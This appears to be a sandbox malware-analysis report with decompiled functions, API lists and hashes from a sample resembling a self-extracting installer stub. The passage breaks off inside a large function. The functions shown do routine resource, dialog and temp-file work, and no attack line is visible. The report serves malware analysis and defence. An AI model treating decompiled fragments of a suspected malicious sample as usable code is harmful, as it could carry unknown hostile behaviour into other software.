Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: d3d9a3dba7d48251ab3a54148c345adc1d9171547fa548da1943934a5b7720e7
Instruction ID: 1f8ef132ea39cb8581b8634711994857b95e4b13ead408962139bf89f646293b
Opcode Fuzzy Hash: d3d9a3dba7d48251ab3a54148c345adc1d9171547fa548da1943934a5b7720e7
Instruction Fuzzy Hash: F4511731A0421ADFDB21EF98C884AAEFBF5FF48700F14416AE9C5A3211DB359941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01084169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E01084169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0108468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0108468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E010844B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E010844B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0108417d
0x0108418f
0x01084193
0x010841b7
0x010841d3
0x010841e6
0x00000000
0x010841e7
0x010841d5
0x010841d6
0x010841d8
0x010841d9
0x010841da
0x010841df
0x010841e1
0x00000000
0x010841e1
0x010841b9
0x010841ba
0x010841bc
0x010841bd
0x010841be
0x00000000
0x010841be
0x00000000

APIs

Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846A0
Part of subcall function 0108468F: SizeofResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846A9
Part of subcall function 0108468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010846C3
Part of subcall function 0108468F: LoadResource.KERNEL32(00000000,00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846CC
Part of subcall function 0108468F: LockResource.KERNEL32(00000000,?,01082D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010846D3
Part of subcall function 0108468F: memcpy_s.MSVCRT ref: 010846E5
Part of subcall function 0108468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010846EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010830B4), ref: 01084189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010830B4), ref: 010841E7

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Strings

<None>, xrefs: 010841C5
FINISHMSG, xrefs: 01084173, 010841AB

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 86242e8842455374c37f32331297c061e4398d5a9ad1a53f4dc8323bb83c0560
Instruction ID: aff5e9923029439603f78ea6556e87002ff09be37cdac736f45fcc57a602182b
Opcode Fuzzy Hash: 86242e8842455374c37f32331297c061e4398d5a9ad1a53f4dc8323bb83c0560
Instruction Fuzzy Hash: 9F01FDB1308226BFFB2436698C84FBB318EDBD8698F004026B7C1E2180CA68CC0202B4

Uniqueness

Uniqueness Score: -1.00%

Function 01087155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01087155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x1088004; // 0x4f5b7a6c
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x1088004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x1088004 = _t39;
				}
				_t37 =  !_t36;
				 *0x1088008 = _t37;
				return _t37;
			}

0x0108715d
0x01087161
0x01087165
0x01087178
0x01087182
0x0108718e
0x01087197
0x010871a0
0x010871b1
0x010871b8
0x010871c4
0x010871c7
0x010871cb
0x010871d5
0x010871da
0x010871da
0x010871dc
0x010871dc
0x010871e2
0x010871e5
0x010871ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01087182
GetCurrentProcessId.KERNEL32 ref: 01087191
GetCurrentThreadId.KERNEL32 ref: 0108719A
GetTickCount.KERNEL32 ref: 010871A3
QueryPerformanceCounter.KERNEL32(?), ref: 010871B8

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: a6f209d1b6c0af8c615035b116f37fff2b64d0d74ab363c5f41d9b5603848d3a
Instruction ID: 745a5086a462171e1ff0dbac5593efa2fc761bba75c71b4c61b263bcf62547ec
Opcode Fuzzy Hash: a6f209d1b6c0af8c615035b116f37fff2b64d0d74ab363c5f41d9b5603848d3a
Instruction Fuzzy Hash: F4114F71E09608DFCF60DFB8D64869EBBF5EF08350FA14496E881D7208E7399A018F40

Uniqueness

Uniqueness Score: -1.00%

Function 010819E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E010819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E010843D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x1089a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E01086CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x010819e0
0x010819e0
0x010819eb
0x010819f2
0x010819f9
0x010819fc
0x01081a01
0x01081a2a
0x01081a2e
0x01081a3e
0x01081a4f
0x01081a62
0x01081a6a
0x00000000
0x01081a03
0x01081a06
0x01081a20
0x01081a20
0x01081a08
0x01081a08
0x01081a14
0x00000000
0x01081a16
0x01081a18
0x01081a70
0x01081a72
0x01081a72
0x01081a14
0x01081a06
0x01081a81

APIs

EndDialog.USER32(?,?), ref: 01081A18
GetDesktopWindow.USER32 ref: 01081A24
LoadStringA.USER32(?,?,00000200), ref: 01081A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 01081A62
MessageBeep.USER32(000000FF), ref: 01081A6A

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 4754739d0670c15661372e7855f161f215f6fa9c379e925d51e028f8523b0f80
Instruction ID: 1c0f2c717f0809925ea3062329f122d38e8a678145a4330671b76f88d6a9fe00
Opcode Fuzzy Hash: 4754739d0670c15661372e7855f161f215f6fa9c379e925d51e028f8523b0f80
Instruction Fuzzy Hash: F411C2316081099FDB20EF68D948AAEB7F8EF49240F008151E9D293184DA359E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010863C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E010863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x1088004; // 0x4f5b7a6c
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E01081781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
				E0108658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x1089124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x1089124 = 0x80070052;
					_t37 = 0;
				}
				return E01086CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x010863cb
0x010863d2
0x010863d8
0x010863ea
0x010863f3
0x01086401
0x01086402
0x01086410
0x01086415
0x01086433
0x01086438
0x01086449
0x01086463
0x0108646d
0x01086477
0x01086477
0x0108647a
0x0108643a
0x0108643a
0x01086444
0x01086444
0x01086492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0108642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0108645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0108647A

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 010863EB

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 1065093856-2356899610
Opcode ID: 8e0ccda0016c48784b56ef7aaa5823d44773fba7817490bd0af8c6c7d713630e
Instruction ID: 4488df4a2e50aa158ad0231147cdec777994e8f4650ccd4bee305a12a911ea33
Opcode Fuzzy Hash: 8e0ccda0016c48784b56ef7aaa5823d44773fba7817490bd0af8c6c7d713630e
Instruction Fuzzy Hash: 9321F371A0821CABDB20EF29DCC4FEF77A8EB84314F0041A9A5C4A7140CAB65D858F64

Uniqueness

Uniqueness Score: -1.00%

Function 010847E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010847E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E01081680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x10891e0; // 0xd98468
						 *(_t34 + 4) = _t11;
						 *0x10891e0 = _t34;
						return 1;
					}
					_t25 =  *0x1088584; // 0x0
					E010844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x1088584; // 0x0
				E010844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x010847e8
0x010847f0
0x010847f4
0x0108480f
0x01084811
0x01084814
0x01084814
0x01084816
0x01084817
0x01084829
0x0108482b
0x0108482f
0x0108484f
0x01084852
0x01084855
0x01084855
0x01084857
0x01084858
0x01084860
0x01084865
0x0108486a
0x0108486f
0x00000000
0x01084876
0x01084831
0x01084841
0x01084847
0x0108480b
0x00000000
0x0108480b
0x010847f6
0x01084806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,01084E6F), ref: 010847EA
LocalAlloc.KERNEL32(00000040,?), ref: 01084823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 01084847

Part of subcall function 010844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01084518
Part of subcall function 010844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 01084554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 01084851

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 359063898-2356899610
Opcode ID: a94a4ae6fe4734816095715121b4603c161121ec0642551eeda9afbecb8960be
Instruction ID: 76b8f2fc56d01088c1c77e2e64ea29c9c6a8c4495b44e91bacab1206bdc488c6
Opcode Fuzzy Hash: a94a4ae6fe4734816095715121b4603c161121ec0642551eeda9afbecb8960be
Instruction Fuzzy Hash: D1115C7460C602DFDB25AE289808F7F3799EBC5700B048459EDC2C7345CA3AC806C720

Uniqueness

Uniqueness Score: -1.00%

Function 01086517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01086517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x1089a3c; // 0x1080000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E010844B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0108651f
0x0108652a
0x01086534
0x0108656b
0x01086577
0x0108657c
0x01086536
0x0108653e
0x01086542
0x00000000
0x01086544
0x01086547
0x0108654c
0x01086549
0x01086549
0x01086549
0x0108655e
0x01086560
0x01086569
0x00000000
0x00000000
0x01086569
0x01086542
0x01086587

APIs

FindResourceA.KERNEL32(01080000,000007D6,00000005), ref: 0108652A
LoadResource.KERNEL32(01080000,00000000,?,?,01082EE8,00000000,010819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01086538
DialogBoxIndirectParamA.USER32(01080000,00000000,00000547,010819E0,00000000), ref: 01086557
FreeResource.KERNEL32(00000000,?,?,01082EE8,00000000,010819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01086560

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 7d9cd9b4fde851540767e5521a8931fcfc3069a0dc86c76bbcb906bc4bab49cf
Instruction ID: d962c0ff8ddad9bfed2efe5d7081b89a15298ba4897db21cdf57347b3dba361b
Opcode Fuzzy Hash: 7d9cd9b4fde851540767e5521a8931fcfc3069a0dc86c76bbcb906bc4bab49cf
Instruction Fuzzy Hash: DD01F772204105BBDB206E599C08DBF7AADEB85760F010156FEC0A3144DB778C118BB0

Uniqueness

Uniqueness Score: -1.00%

Function 01083680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01083680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0108368c
0x0108368f
0x01083691
0x0108369f
0x010836a7
0x00000000
0x00000000
0x010836ba
0x00000000
0x010836bc
0x010836bc
0x010836c0
0x010836cb
0x010836c2
0x010836c4
0x010836c4
0x010836da
0x010836e0
0x010836e6
0x00000000
0x00000000
0x010836e6
0x00000000
0x010836ba
0x010836ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0108369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010836B2
DispatchMessageA.USER32(?), ref: 010836CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010836DA

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 7c869568091048440d719f29bd16d39230c3671ca159c552fc102380f2f44cb1
Instruction ID: 938f8b551777f4f63401336349a994b17d4b7c37e7865ad74b4a9e0c5f0c1e4b
Opcode Fuzzy Hash: 7c869568091048440d719f29bd16d39230c3671ca159c552fc102380f2f44cb1
Instruction Fuzzy Hash: A5018472A08214BBDF305AAE9C48EEF7ABCFBC9F24F00415ABAC5E6284D565C550C760

Uniqueness

Uniqueness Score: -1.00%

Function 010865E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E010865E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x010865e8
0x010865ed
0x010865ef
0x010865f2
0x010865f4
0x010865f4
0x010865f6
0x010865f7
0x01086608
0x01086611
0x01086618
0x0108661c
0x00000000
0x00000000
0x0108660e
0x01086623
0x01086625
0x0108663b
0x0108663b
0x0108663d
0x01086641
0x01086610
0x01086610
0x00000000
0x01086610
0x01086644
0x01086647
0x01086647
0x01086621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,01082B33), ref: 01086602
CharPrevA.USER32(?,00000000), ref: 01086612
CharPrevA.USER32(?,00000000), ref: 01086629
CharNextA.USER32(00000000), ref: 01086635

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 1ba95319bfc55a044bac60618023b58d2d5acb23c565dde4ec517bc3dac0e8e0
Instruction ID: 4e9dc0084610e6d26431e3f76cb0a9fd6e0f0973a0aa416fc35710e60104d2ca
Opcode Fuzzy Hash: 1ba95319bfc55a044bac60618023b58d2d5acb23c565dde4ec517bc3dac0e8e0
Instruction Fuzzy Hash: 7CF0F93110C590AEEB332A2C88C88BBBFDCCF8B19871A01EFE9D193501D61B09168761

Uniqueness

Uniqueness Score: -1.00%

Function 010869B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010869B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x10881f8 = E01086C70();
				__set_app_type(E01086FBE(2));
				 *0x10888a4 =  *0x10888a4 | 0xffffffff;
				 *0x10888a8 =  *0x10888a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x1088528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x108851c; // 0x0
				 *_t5 = _t12;
				_t6 = E01087000();
				if( *0x1088000 == 0) {
					__setusermatherr(E01087000);
				}
				E010871EF(_t6);
				return 0;
			}

0x010869b7
0x010869c2
0x010869c8
0x010869cf
0x010869d8
0x010869de
0x010869e4
0x010869e6
0x010869ec
0x010869f2
0x010869f4
0x01086a00
0x01086a07
0x01086a0d
0x01086a0e
0x01086a15

APIs

Part of subcall function 01086FBE: GetModuleHandleW.KERNEL32(00000000), ref: 01086FC5

__set_app_type.MSVCRT ref: 010869C2
__p__fmode.MSVCRT ref: 010869D8
__p__commode.MSVCRT ref: 010869E6
__setusermatherr.MSVCRT ref: 01086A07

Memory Dump Source

Source File: 00000001.00000002.363389805.0000000001081000.00000020.00000001.01000000.00000004.sdmp, Offset: 01080000, based on PE: true

Associated: 00000001.00000002.363384775.0000000001080000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363400852.0000000001088000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.363406217.000000000108C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1080000_bKug.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: d53411ab3094191cede22ee3d550fdff10113401d6d20921210e649dc7bbe127
Instruction ID: 5b2d00a1341364faf395cdb9cada3b00d1602460704567b73cef417a4593ef09
Opcode Fuzzy Hash: d53411ab3094191cede22ee3d550fdff10113401d6d20921210e649dc7bbe127
Instruction Fuzzy Hash: 84F0DF7460C712CFCB78AB38B50961C3BA1BB04331B61860BE4E2862D8CF3F81418F14

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aKuf.exePID: 4916, Parent PID: 2188COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	31.3%
Signature Coverage:	14.1%
Total number of Nodes:	355
Total number of Limit Nodes:	37

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
